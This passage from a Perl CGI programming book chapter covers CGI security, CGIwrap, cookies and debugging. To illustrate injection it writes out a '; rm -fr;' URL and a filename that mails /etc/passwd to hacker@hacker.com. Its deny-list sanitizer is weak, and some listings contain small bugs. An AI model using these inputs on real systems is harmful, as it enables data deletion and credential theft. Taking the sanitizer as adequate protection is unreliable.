addition, let's say that the name of the directory to display

was passed to your program using the <TT>PATH_INFO</TT>

environment variable. The following URL could be used to call

your program:

<BLOCKQUOTE>

<PRE>

http://www.foo.com/cgi-bin/dirlist.pl/docs

</PRE>

</BLOCKQUOTE>

<P>

Inside your program, the <TT>PATH_INFO</TT>

environment variable is set to <TT>docs</TT>.

In order to get the directory listing, all that is needed is a

call to the <TT>ls</TT> command in

UNIX or the <TT>dir</TT> command in

DOS. Everything looks good, right?

<P>

But what if the program was invoked with this command line?

<BLOCKQUOTE>

<PRE>

http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;

</PRE>

</BLOCKQUOTE>

<P>

Now, all of a sudden, you are faced with the possibility of files

being deleted because the semi-colon (;) lets multiple commands

be executed on one command line.

<P>

This same type of security hole is possible any time you try to

run an external command. You might be tempted to use the <TT>mail</TT>,

<TT>sendmail</TT>, or <TT>grep</TT>

commands to save time while writing your CGI program, but because

all of these programs are easily duplicated using Perl, try to

resist the temptation.

<P>

Another security hole is related to using external data to open

or create files. Some enterprising hacker could use <TT>&quot;|

mail hacker@hacker.com &lt; /etc/passwd&quot;</TT> as the

filename to mail your password file or any other file to himself.

<P>

All of these security holes can be avoided by removing the dangerous

characters (like the | or pipe character).

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Define the </I><TT><I>improveSecurity()</I></TT><I>

fuNCtion.<BR>

Copy the passed string into </I><TT><I>$_</I></TT><I>,

the default search space.<BR>

Protect against command-line options by removing </I><TT><I>-</I></TT><I>

and </I><TT><I>+</I></TT><I> characters.

<BR>

Additional protection against command-line options.<BR>

Convert all dangerous characters into harmless underscores.<BR>

Return the </I><TT><I>$_</I></TT><I>

variable.</I>

</BLOCKQUOTE>

<P>

Listing 19.3 shows how to remove dangerous characters.

<HR>

<BLOCKQUOTE>

<B>Listing 19.3&nbsp;&nbsp;19LST03.PL-How to Remove Dangerous

Characters<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

sub improveSecurity {

    $_ = shift;

    s/\-+(.*)/\1/g;

    s/(.*)[ \t]+\-(.*)/\1\2/g;

    tr/\$\'\`\&quot;\&lt;\&gt;\/\;\!\|/_/;

    return($_);

}

</PRE>

</BLOCKQUOTE>

<HR>

<H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>

CGIwrap and Security</FONT></A></H2>

<P>

CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-based

utility written by Nathan Neulinger that lets general users run

CGI scripts without needing access to the server's <TT>cgi-bin</TT>

directory. Normally, all scripts must be located in the server's

main <TT>cgi-bin</TT> directory and

all run with the same UID (user ID) as the Web server. CGIwrap

performs various security checks on the scripts before changing

ID to match the owner of the script. All scripts are executed

with same the user ID as the user who owns them. CGIwrap works

with NCSA, Apache, CERN, Netsite, and probably any other UNIX

Web server.

<P>

Any files created by a CGI program are normally owned by the Web

server. This can cause a problem if you need to edit or remove

files created by CGI programs. You might have to ask the system

administrator for help because you lack the proper auhorization.

All CGI programs have the same system permissions as the Web server.

If you run your Web server under the root user ID-being either

very brave or very foolish-a CGI program could be tricked into

erasing the entire hard drive. CGIwrap provides a way around these

problems.

<P>

With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT>

directory and run under their user ID. This means that any files

the CGI program creates are owned by the same user. Damage caused

by any security bugs you may have introduced-via the CGI program-will

be limited to your own set of directories.

<P>

In addition to this security advantage, CGIwrap is also an excellent

debugging tool. When CGIwrap is installed, it is copied to <TT>cgiwrapd</TT>,

which can be used to view output of failing CGIs.

<P>

You can install CGIwrap by following these steps:

<OL>

<LI>Obtain the source from the <B>http://www.umr.edu/~cgiwrap/download.html</B>

Web page.

<LI>Ensure that you have root access.

<LI>Unpack and run the Configure script.

<LI>Type <B>make</B>.

<LI>With a user ID of root, copy the <TT>cgiwrap</TT>

executable to your server's <TT>cgi-bin</TT>

directory.

<LI>Make sure that <TT>cgiwrap</TT>

is owned by root and executable by all users by typing <B>chown

root cgiwrap; chmod 4755 cgiwrap</B>. The <TT>cgiwrap</TT>

executabe must also be set UID.

<LI>In order to gain the debugging advantages of CGIwrap, create

symbolic links to <TT>cgiwrap</TT>

called <TT>cgiwrapd</TT>, <TT>nph-cgiwrap</TT>,

and <TT>nph-cgiwrapd</TT>. The first

symbolic link can be created by typing <B>ln -s cgiwrap cgiwrapd</B>.

The others are created using similar commands.

</OL>

<P>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Tip</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

You can find additional information at the <TT><B><FONT FACE="Courier">http://www.umr.edu/<B>~cgiwrap/install.html</B></FONT></B></TT> web site.

</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

CGIs that run using CGIwrap are stored in a <TT>cgi-bin</TT>

directory under an individual user's public Web directory and

called like this:

<BLOCKQUOTE>

<PRE>

http://servername/cgi-bin/cgiwrap/~userid/scriptname

</PRE>

</BLOCKQUOTE>

<P>

To debug a script run via cgiwrap, add the letter &quot;d&quot;

to <TT>cgiwrap</TT>:

<BLOCKQUOTE>

<PRE>

http://servername/cgi-bin/cgiwrapd/~userid/scriptname

</PRE>

</BLOCKQUOTE>

<P>

When you use CGIwrap to debug your CGI programs, quite a lot of

information will be displayed in the Web browser's window. For

example, if you called a CGI program with the following URL:

<BLOCKQUOTE>

<PRE>

http://www.engr.iupui.edu/cgi-bin/cgiwrapd/~dbewley/cookie-test.pl

</PRE>

</BLOCKQUOTE>

<P>

The output might look like this:

<BLOCKQUOTE>

<PRE>

Redirecting STDERR to STDOUT

Setting Limits (CPU)

Environment Variables:

   QUERY_STRING: ''

   PATH_INFO: '/~dbewley/cookie-test.pl'

   REMOTE_HOST: 'x2s5p10.dialin.iupui.edu'

   REMOTE_ADDR: '134.68.249.69'

   SCRIPT_NAME: '/cgi-bin/cgiwrapd'

Trying to extract user/script from PATH_INFO

Extracted Data:

   User:  'dbewley'

   Script:  'cookie-test.pl'

Stripping user and script data from PATH_INFO env. var.

Adding user and script to SCRIPT_NAME env. var.

Modified Environment Variables:

   PATH_INFO: ''

   SCRIPT_NAME: '/cgi-bin/cgiwrapd/dbewley/cookie-test.pl'

Sanitize user name: 'dbewley'-'dbewley'

Sanitize script name: 'cookie-test.pl'-'cookie-test.pl'

Log Request

   Opening log file.

   Writing log entry.

   Closing log file.

   Done logging request.

User Data Retrieved:

   UserName: 'dbewley'

   UID: '8670'

   GID: '200'

   Directory: '/home/stu/d/dbewley'

UIDs/GIDs Changed To:

   RUID: '8670'

   EUID: '8670'

   RGID: '200'

   EGID: '200'

Current Directory:  '/sparcus/users/dbewley/www/cgi-bin'

Results of stat:

   File Owner: '8670'

   File Group: '200'

   Exec String:  './cookie-test.pl'

Output of script follows:

=====================================================

Set-Cookie: user=dbewley; expires=Wednesday, 09-Nov-99 00:00:00 GMT;

path=/cgi-bin/; domain=.engr.iupui.edu; 

Set-Cookie: flag=black; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/

cgi-bin/; domain=.iupui.edu; 

Set-Cookie: car=honda:accord:88:LXI:green; expires=Wednesday, 09-Nov-99

00:00:00 GMT; path=/cgi-bin/; domain=.engr.iupui.edu; 

Content-type: text/html

Cookies:&lt;BR&gt;

flag = black&lt;br&gt;

car = honda:accord:88:LXI:green&lt;br&gt;

user = dbewley&lt;br&gt;

</PRE>

</BLOCKQUOTE>

<P>

This output can be invaluable if your script is dying because

of a syntax error before it can print an HTTP header to the browser.

<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Note</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

If you'd like a more in-depth description of CGI Security, visit these Web sites:</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<BLOCKQUOTE>

<PRE>

http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec/# CGI Security Tutorial

http://www.umr.edu/</FONT><FONT SIZE=1 FACE="Courier">~</FONT><FONT SIZE=2 FACE="Courier">cgiwrap/   # CGIwrap Home Page

</PRE>

</BLOCKQUOTE>

<H2><A NAME="Cookies"><FONT SIZE=5 COLOR=#FF0000>

Cookies</FONT></A></H2>

<P>

Most Webmasters want to track the progress of a user from page

to page as they click about the site. Unfortunately, HTTP is a

<I>stateless</I> protocol. Stateless protocols have no memory;

they only understand the current command. This makes tracking

a visitor through a site difficult at best. A user could visit

a site, leave, and come back a day or a minute later, possibly

from a different IP address. The site maintainer has no way of

knowing if this is the same browser or not.

<P>

One answer to this dilemma is to use <I>cookies</I> in your CGI

programs. Cookies can provide a way to maintain information from

one HTTP request to the next-remember the coNCept of persistent

information?

<P>

A cookie is a small chunk of data, stored on the visitor's local

hard drive by the Web server. It can be used to track your path

through a Web site and develop a visitor's profile for marketing

or informational purposes. Cookies can also be used to hold information

like account numbers and purchase decisions so that shopping applications

can be created.

<H3><A NAME="CookieSecurity">

Cookie Security</A></H3>

<P>

There has been some controversy about whether cookies are secure.

Although the cookie mechanism provides a way for a Web server

to write data to your hard disk the limitations are very strict.

A client may only hold a maximum of 300 cookies at a time and

a single server may only give 20 cookies to it.  Cookies can only

be 4 kilobytes each, iNCluding the name and data, so, at most,

a visitor's hard disk may have 1.2 megabytes of hard disk being

used to store cookies. In addition, cookie data may only be written

to one file, usually called <TT>cookies.txt</TT>.

<P>

During a browsing session, Netscape stores cookies in memory,

but when the browser is exited, cookies are written into a file

called <TT>cookies.txt</TT>. On the

Macintosh, the cookie jar is in a file called <TT>MagicCookie</TT>

in the prefereNCes folder. The cookie file contains plain text

as shown in Listing 19.3.

<H3><A NAME="HowAreCookiesCreatedandRead">

How Are Cookies Created and Read?</A></H3>

<P>

Cookies are set using a <TT>Set-cookie</TT>:

HTTP header with five possible fields separated with a semicolon

and a space. These fields are:

<UL>

<LI><B>cookie-name=cookie-value;</B>-name of the cookie and its

value. The name and the value combined must be less than 4 kilobytes

in length.

<LI><B>expiration=expiration-date;</B>-the date the cookie will

be deleted from the cookie file. You can delete a previously set

cookie ahead of schedule by creating a second cookie with the

same name, path, and domain, but with an expiration date in the

past.

<LI><B>path=cookie-path;</B>-combines with the domain name to

determine when a browser should show a cookie to the server.

<LI><B>domain=server-domain;</B>-used to determine when a browser

should show a cookie to the server. Usually, cookies are created

with the Web server's name without the <TT>www</TT>.

For example, <TT>.foo.net</TT> instead

of <TT>www.foo.net</TT>. Notice that

the leading period is retained.

<LI><B>secure</B>-ensures that the cookie will be sent back only

to the server when a secure HTTP connection has been established.

</UL>

<P>

When all of these elements are put together, they look like this:

<BLOCKQUOTE>

<PRE>

Set-Cookie: user_addr=ppp1.dialin.iupui.edu;

expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/;

domain=.engr.iupui.edu; secure

</PRE>

</BLOCKQUOTE>

<P>

Listing 19.4 contains a program that both sets and read cookies.

First, it will create four cookies and then it will read those

cookies from the <TT>HTTP_COOKIE</TT>

environment variable. Inside the <TT>HTTP_COOKIE</TT>

environment variable, the cookies are delimited by a semicolon

and a space. The cookie fields are separated by commas, and the

name-value pairs are separated by equal signs. In order to use

cookies, you need to parse the <TT>HTTP_COOKIE</TT>

variable at three different levels.

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Turn on the warning option.<BR>

Turn on the strict pragma.<BR>

Declare a variable to hold the expiration date and time of the

cookies.<BR>

Declare a variable to hold the domain name.<BR>

Declare a variable to hold the path name.<BR>

Set four cookies with different values.<BR>

Read those four cookies from the environment; place them into

</I><TT><I>%cookies</I></TT><I>.<BR>

Start the HTML Web page.<BR>

Display a text heading on the Web page.<BR>

Start an HTML table.<BR>

Display each cookie in a table row.<BR>

End the table.<BR>

End the Web page.<BR>

Define the </I><TT><I>setCookie()</I></TT><I>

fuNCtion.<BR>

Create local variables from the parameter array.<BR>

Send the </I><TT><I>Set-Cookie:</I></TT><I>

HTTP header to the Web browser.<BR>

Send the secure option only if requested.<BR>

End the header with a newline.<BR>

Define the </I><TT><I>getCookies()</I></TT><I>

fuNCtion.<BR>

Create a local hash to hold the cookies.<BR>

Iterate over an array created by splitting the </I><TT><I>HTTP_COOKIE</I></TT><I>

environment<BR>

variable based on the &quot;;&quot; character sequeNCe.<BR>

Split off the name of the cookie.<BR>

Create a hash entry with the cookie's name as the key and the

rest of the cookie as the entry's value.<BR>

Return the hash.</I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.4&nbsp;&nbsp;19LST04.PL-How to Set and Retrieve

Cookies<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

#!/usr/local/bin/perl -w

use strict;



my($expDate)   = &quot;Wednesday, 09-Nov-99 00:00:00 GMT&quot;;

my($theDomain) = &quot;.engr.iupui.edu&quot;;

my($path)      = &quot;/cgi-bin/&quot;;



setCookie(&quot;user&quot;, &quot;dbewley&quot;, $expDate, $path, $theDomain);



setCookie(&quot;user_addr&quot;, $ENV{'REMOTE_HOST'}, $expDate, $path, $theDomain)

    if defined($ENV{'REMOTE_HOST'});



setCookie(&quot;flag&quot;, &quot;black&quot;, $expDate, $path, &quot;.iupui.edu&quot;);

setCookie(&quot;car&quot;, &quot;honda:accord:88:LXI:green&quot;, $expDate, $path, 

$theDomain);



my(%cookies) = getCookies();



print(&quot;Content-type: text/html\n\n&quot;);

print(&quot;&lt;HTML&gt;&quot;);

print(&quot;&lt;HEAD&gt;&lt;TITLE&gt;The Cookie Display&lt;/TITLE&gt;&lt;/HEAD&gt;&quot;);

print(&quot;&lt;BODY&gt;&quot;);

print(&quot;&lt;H1&gt;Cookies&lt;/H1&gt;&quot;);

print(&quot;&lt;TABLE BORDER=1 CELLPADDING=10&gt;&quot;);

foreach (sort(keys(%cookies))) {

    print(&quot;&lt;TR&gt;&lt;TD&gt;$_&lt;/TD&gt;&lt;TD&gt;$cookies{$_}&lt;/TD&gt;&lt;/TR&gt;&quot;);

}

print(&quot;&lt;/TABLE&gt;&quot;);

print(&quot;&lt;/BODY&gt;&quot;);

print(&quot;&lt;/HTML&gt;&quot;);





sub setCookie {

    my($name, $val, $exp, $path, $dom, $secure) = @_;



    print(&quot;Set-Cookie: &quot;);

    print(&quot;$name=$val, expires=$exp, path=$path, domain=$dom&quot;);

    print(&quot;, $secure&quot;) if defined($secure);

    print(&quot;\n&quot;);

}



sub getCookies {

    my(%cookies);



    foreach (split (/; /,$ENV{'HTTP_COOKIE'})){

        my($key) = split(/=/, $_);



        $cookies{$key} = substr($_, index($_, &quot;=&quot;)+1);

    } 

    return(%cookies);

}

</PRE>

</BLOCKQUOTE>

<HR>

<P>

This program shows that the Web server stores a copy of any cookies

that you set into the <TT>HTTP_COOKIE</TT>

environment variable. It only performs one level of parsing. In

order to create a really useful <TT>getCookies()</TT>

fuNCtion, you need to split the cookie on the comma character

and then again on the equals character.

<H3><A NAME="CanaVisitorsBrowserSupportCookies">

Can a Visitor's Browser Support Cookies?</A></H3>

<P>

One difficulty that you may have in using cookies is that not

every browser can support them. If you are using cookies, you

need a user-friendly way of telling a visitor that the feature

he or she is  trying to use is not available to him or her.

<P>

Listing 19.5 contains a script that shows you a nice way of automatically

determining if a visitor's Web browser supports cookies. The CGI

program will set a cookie and then redirect the visitor's Web

browser back to itself with some additional path information.

When the script (during its second invocation) sees the extra

path information, it checks for the previously created cookie.

If it exists, the visitor's browser has passed the test. Otherwise,

the visitor's browser does not support cookies.

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Turn on the warning option.<BR>

<I>Turn on the strict pragma.<BR>

<I>If there is no query information, then set a cookie and reload

the script.<BR>

<I>Otherwise, see if the cookie set before the reload exits.<BR>

<I>If the cookie exists, the browser supports cookies.<BR>

<I>If the cookie does not exist, the browser does not support

cookies.</I></I></I></I></I></I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.5&nbsp;&nbsp;19LST05.PL-How to Tell Whether  the

Visitor's Browser Supports Cookies<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

#!/usr/bin/perl -w

use strict;



if ($ENV{'QUERY_STRING'} ne 'TESTING') {

    print &quot;HTTP/1.0 302 Moved Temporarily\n&quot;; 

    print &quot;Set-Cookie: Cookie=Test\n&quot;;

    print &quot;Location: $ENV{'SCRIPT_NAME'}?TESTING\n\n&quot;;

}

else {

    if ($ENV{'HTTP_COOKIE'} =~ /Cookie=Test/) {

        print(&quot;Content-type: text/html\n\n&quot;);

        print(&quot;&lt;HTML&gt;&quot;);

        print(&quot;&lt;HEAD&gt;&lt;TITLE&gt;$ENV{'HTTP_USER_AGENT'} supports Cookies

&lt;/TITLE&gt;&lt;/HEAD&gt;&quot;);

        print(&quot;&lt;BODY&gt;&quot;);

        print(&quot;Your browser, $ENV{'HTTP_USER_AGENT'}, supports the

Netscape HTTP &quot;);

        print(&quot;Cookie Specification.&quot;);

        print(&quot;&lt;/BODY&gt;&lt;/HTML&gt;&quot;);

    }

    else {

        print(&quot;Content-type: text/html\n\n&quot;);

        print(&quot;&lt;HTML&gt;&quot;);

        print(&quot;&lt;HEAD&gt;&lt;TITLE&gt;$ENV{'HTTP_USER_AGENT'} doesn't support

Cookies&lt;/TITLE&gt;&lt;/HEAD&gt;&quot;);

        print(&quot;&lt;BODY&gt;&quot;);

        print(&quot;Your browser, $ENV{'HTTP_USER_AGENT'}, doesn't appear to

support cookies.&quot;);

        print(&quot;Cookie Specification.&quot;);

        print(&quot;&lt;/BODY&gt;&lt;/HTML&gt;&quot;);

    }

}

</PRE>

</BLOCKQUOTE>

<HR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Note</B></TD></TR>

<TR><TDz>

<BLOCKQUOTE>

You can find more information about cookies at these Web sites:</BLOCKQUOTE>

<BLOCKQUOTE>

<TT>http://home.netscape.com/newsref/std/cookie_spec.html<BR>

http://www.netscapeworld.com/netscapeworld/nw-07-1996/nw-07-cookies.html<BR>

http://www.emf.net/~mal/cookiesinfo.html<BR>

http://ds.internic.net/internet-drafts/draft-ietf-http-state-mgmt-03.txt<BR>

http://www.illuminatus.com/cookie/<BR>

http://www.jasmin.com/cook0696.html<BR>

http://www.bravado.net/rodgers/InterNetNews.html</TT>

</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<H2><A NAME="DebuggingCGIPrograms"><FONT SIZE=5 COLOR=#FF0000>

Debugging CGI Programs</FONT></A></H2>

<P>

One of the main reasons to use CGI programs is to generate HTML

documents. When something goes wrong, the common error message

will be 500 Server Error. This message can be caused by several

things. For example, the #! comment at the top of your script

could be invalid, the first line of output was an invalid HTTP

header, there might not be a blank line after the HTTP header,

or you could simply have a syntax error.

<H3><A NAME="SendingOutputtotheServersLogFile">

Sending Output to the Server's Log File</A></H3>

<P>

When your CGI program starts, the <TT>STDERR

</TT>file handle is connected to the server's error log.

You can use <TT>STDERR </TT>to save

status messages that you don't want the user to see. The advantage

of using <TT>STDERR </TT>is that you

don't need to open or close a file. In addition, you'll always

know where the messages are. This is important if you're working

on a team.

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Send the HTTP header indicating a plain text document.<BR>

Send a line of text.<BR>

Call the </I><TT><I>logError()</I></TT><I>

fuNCtion to send a message to the server's log file.<BR>

Send a line of text.<BR>

Define the </I><TT><I>logError()</I></TT><I>

fuNCtion<BR>

Declare a local variable to hold the message.<BR>

Print the message to </I><TT><I>STDERR </I></TT><I>with

a timestamp.<BR>

Define the </I><TT><I>timeStamp()</I></TT><I>

fuNCtion.<BR>

Declare some local variables to hold the current date and time.

<BR>

Call the </I><TT><I>zeroFill()</I></TT><I>

fuNCtion to format the numbers.<BR>

Return a formatted string holding the current date and time.<BR>

Define the </I><TT><I>zeroFill()</I></TT><I>

fuNCtion-turns &quot;1&quot; into &quot;01.&quot;<BR>

Declare a local variable to hold the number to be filled.<BR>

Declare a local variable to hold the string length that is needed.

<BR>

Find differeNCe between current string length and needed length.

<BR>

If the string is big enough (like &quot;12&quot;), then return

it.<BR>

If the string is too big, prefix it with some zeroes.</I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.6&nbsp;&nbsp;19LST06.PL-Sending Messages to the

Server's Error Log<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

print(&quot;Content-type: text/plain\n\n&quot;);

print(&quot;This is line one.\n&quot;);

logError(&quot;GOOD Status\n&quot;);

logError(&quot;BAD  Status\n&quot;);

print(&quot;This is line two.\n&quot;); 



sub logError {

    my($msg) = shift;

    print STDERR (timeStamp(), &quot; $msg&quot;);

}



sub timeStamp {

    my($sec, $min, $hour, $mday, $mon, $year) = (localtime(time))[0..5];

    $mon  = zeroFill($mon, 2);

    $hour = zeroFill($hour, 2);

    $min  = zeroFill($min, 2);

    $sec  = zeroFill($sec, 2);

    return(&quot;$mon/$mday/$year, $hour:$min:sec&quot;);

}



sub zeroFill {

    my($temp) = shift;

    my($len)  = shift;

    my($diff) = $len - length($temp);



    return($temp) if $diff &lt;= 0;

    return(('0' x $diff) . $temp);

}

</PRE>

</BLOCKQUOTE>

<HR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Caution</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

According to the CGI specifications, the <TT>STDERR</TT> file handle should be connected to the server's error log. However, I found that this was not true when using Windows 95 and O'Reilly's Website server software. There may be other combinations of 
operating systems and server software that also fail to connect <TT>STDERR</TT> to the error log.

</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<H3><A NAME="SendingSTDERRtotheWebBrowser">

Sending STDERR to the Web Browser</A></H3>

<P>

If you want your users to see the error messages your script generates,

use the <TT>open()</TT> fuNCtion to

redirect <TT>STDERR</TT> to <TT>STDOUT</TT>

like this:

<BLOCKQUOTE>

<PRE>

open(STDERR, &quot;&gt;&amp;STDOUT&quot;);

</PRE>

</BLOCKQUOTE>

<P>

After that statement is executed, the output of all print statements

that use the STDERR file handle will be displayed in the Web browser

window.

<P>

You need to be a little careful when using this ability. Your

normal error messages will not have the HTML tags required to

make them display properly.

<H3><A NAME="CGITap">

CGITap</A></H3>

<P>

CGITap (<B>http://scendtek.com/cgitap/</B>) is a CGI debugging

aid that can help pinpoint the problem in a troubling CGI application.

CGITap installs in the <TT>cgi-bin</TT>

directory and runs any CGI programs in &quot;tap mode.&quot; Tap

mode runs the CGI program as normal; however, the output contains

additional diagnostic and environment information. This information

can greatly speed up the process of debugging your CGI scripts.

<P>

CGITap may be installed in any CGI enabled directory and requires

perl4.036 or later. You can install CGITap by following these

steps:

<OL>

<LI>Download the CGITap script from the <B>http://scendtek.com/cgitap/</B>

Web page.

<LI>Install CGITap in a CGI enabled directory-typically named

cgi-bin.

<LI>As with any Perl script, be sure the first line of CGITap

contains the correct path to your system's Perl interpreter. You

should be familiar with the location. If not, try typing <B>which

perl</B> on the UNIX command line.

<LI>Check the file permissions to ensure that CGITap is executable.CGITap

has two methods of debugging. The first is adequate for simple

CGI applications that do not use HTML forms for input. The second

method is used for CGI programs that process HTML form information.

</OL>

<P>

For simple CGIs, add <TT>cgitap</TT>

to the URL. For example, normally a CGI program that just prints

the date is called like this:

<P>

<TT>http://localhost/cgi-bin/date</TT>

<P>

That CGI program might display the following in the browser's

window:

<BLOCKQUOTE>

<PRE>

Sun Aug 18 16:07:37 EST 1996

</PRE>

</BLOCKQUOTE>

<P>

In order to use CGITap for debugging, use a similar URL but with

<TT>cgitap</TT> inserted.

<BLOCKQUOTE>

<PRE>

http://localhost/cgi-bin/cgitap/date

</PRE>

</BLOCKQUOTE>

<P>

CGITap will extract your CGI program's name, display the CGI environment

to the browser, perform some checks on the program, then execute

the program and return the actual results (both in HTML source

and the actual document).

<P>

CGI programs that process HTML forms will be discussed in Chapter

20, &quot;Form Processing,&quot; but while I'm talking about CGITap,

let me also mention how to use CGITap with HTML forms. A slightly

more complicated method must be used for debugging complex CGI

scripts that require form processing.

<P>

The URL of a form's action is hard coded (via the ACTION modifier

of the <TT>&lt;FORM&gt;</TT> tag)

and you may not want to change it to iNClude <TT>cgitap</TT>.

To allow CGITap to execute automatically when the form posts to

its normal action URL, you can make use of UNIX symbolic links.

If you are using Windows NT or Windows 95, you must change the

URL in the HTML form. The steps for UNIX platforms are:

<OL>

<LI>Move your CGI script to a new script called <TT>yourscript.tap</TT>

by typing <B>mv yourscript yourscript.tap</B>.

<LI>Make a symbolic link called <TT>yourscript</TT>

to <TT>cgitap</TT> by typing <B>ln

-s cgitap yourscript.</B>For example, let's assume you have a

CGI script called <TT>mailit</TT>

that processes form input data, mails the information to you,

and returns an HTML page to the Web browser. To debug this script,

move <TT>mailit</TT> to <TT>mailit.tap,</TT>

using the following command:

</OL>

<BLOCKQUOTE>

<PRE>

mv mailit mailit.tap

</PRE>

</BLOCKQUOTE>

<P>

Then create a link to <TT>cgitap,</TT>

using this command:

<BLOCKQUOTE>

<PRE>

ln -s cgitap mailit

</PRE>

</BLOCKQUOTE>

<P>

Now, you can fill in the HTML form and submit it as usual.

<P>

This method allows UNIX-based scripts and forms to be debugged

without having to change hard-coded URLs in your HTML documents.

When the form is posted, the results will be the CGITap debugging

information, followed by the normal output of <TT>mailit</TT>.

<H3><A NAME="GeneratinganErrorHTMLPage">

Generating an Error HTML Page</A></H3>

<P>

It is a good idea to isolate all program statements that have

a high probability to generate errors at the beginning of your

program, or, at least, before the HTTP header is sent. This lets

you create HTML response pages that correspond to the specific

error that was eNCountered. Listing 19.7 shows a simple example

of this coNCept. You could expand this example to cover many different

errors that can occur.

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Try (and fail) to open a file. Call the </I><TT><I>error()</I></TT><I>

fuNCtion.<BR>

Define the </I><TT><I>error()</I></TT><I>

fuNCtion.<BR>

Declare a local variable to hold the error message string.<BR>

Output an HTML page to display the error message.</I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.7&nbsp;&nbsp;19LST07.PL-Generating an Error Response

Using HTML<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

open(FILE, 'AAAA.AAA') or error(&quot;Could not open file AAAA.AAA&quot;);



sub error {

    my($message) = @_;



    print(&quot;Content-type: text/html\n\n&quot;);

    print(&quot;&lt;HTML&gt;\n&quot;);

    print(&quot;&lt;HEAD&gt;&lt;TITLE&gt;CGI Error&lt;/TITLE&gt;&lt;/HEAD&gt;\n&quot;);

    print(&quot;&lt;H1&gt;Status: 500 An Error Has Occurred&lt;/H1&gt;\n&quot;);

    print(&quot;&lt;HR&gt;\n&quot;);

    print(&quot;$message\n&quot;);

    print(&quot;&lt;/BODY&gt;\n&quot;);

    print(&quot;&lt;/HTML&gt;\n&quot;);

}

</PRE>

</BLOCKQUOTE>

<HR>

<P>

I'm sure you agree that error messages that you provide are more

informative than the standard ones.

<H2><A NAME="Summary"><FONT SIZE=5 COLOR=#FF0000>

Summary</FONT></A></H2>

<P>

This chapter certainly covered a lot of material. It started by

defining CGI as an interface between Web servers and external

programs. Then, you read why Perl is a great programming language

to use when writing CGI programs. Next, the chapter touched on

CGI applications versus Java applets and how they are complementary

technologies.

<P>

After those introductory comments, the fun started. CGI programs

were shown to be invoked by a URL. The URL could be entered directly

into a Web browser or stored in a Web page as a hypertext link

or the destination for HTML form information.

<P>

Before CGI program can be run under the UNIX operating systems,

their file permissions need to be set correctly. Files have three

types of permissions: read, write, and execute. And there are

three types of users that access files: user, group, and others.

CGI programs must be both readable and executable by others.

<P>

The first line of output of any CGI program must be some type

of HTTP header. The most common header is <TT>Content-type:,</TT>

which basically tells the Web browser what to expect (plain text,

perhaps? Or maybe some HTML). The <TT>Location:</TT>

header redirects the Web browser to another URL. The <TT>Set-cookie:</TT>

header stores a small bit of information on the visitor's local

disk. The last header is <TT>Status:</TT>,

which tells the Web browser that an error has arisen.

<P>

By placing a <TT>/</TT> or <TT>?</TT>

at the end of a URL, information can be passed to the CGI program.

Information after a <TT>/</TT> is

placed into the <TT>PATH_INFO</TT>

environment variable. Information after a <TT>?</TT>

is placed into the <TT>QUERY_STRING</TT>

environment variable.

<P>

Environment variables play a big role in CGI programs. They are

the priNCipal means that Web servers use to provide information.

For example, you can find out the client's IP address using the

<TT>REMOTE_ADDR</TT> variable. And

the <TT>SCRIPT_NAME</TT> variable

contains the name of the current program.

<P>

URL eNCoding is used to prevent characters from being misinterpreted.

For example, the <TT>&lt;</TT> character

is usually eNCoded as <TT>%3C</TT>.

In addition, most spaces are converted into plus signs. Listing

19.1 contains a fuNCtion called <TT>decodeURL()</TT>

that will decode the URL eNCoding.

<P>

One of the biggest security risks happens when a user's data (form

input or extra path information) is exposed to operating system

commands such as <TT>mail</TT> or

<TT>grep</TT>. <B>Never trust user

input!</B> Always suspect the worst. Most hackers spend many hours

looking at manuals and source code to find software weaknesses.

You need to read about Web security in order to protect your site.

<P>

The CGIwrap program offers a way to limit the damage potential

by running CGI program with a user ID that is different from the

Web server's. The programs are running using the user's user ID

so that damage is limited to your home directory.

<P>

Cookies are used to store information on the user's hard drive.

They are a way to create persistent information that lasts from

one visit to the next.

<P>

You can debug CGI programs by sending messages to the server's

log file using the <TT>STDERR </TT>file

handle. Or you could redirect <TT>STDERR

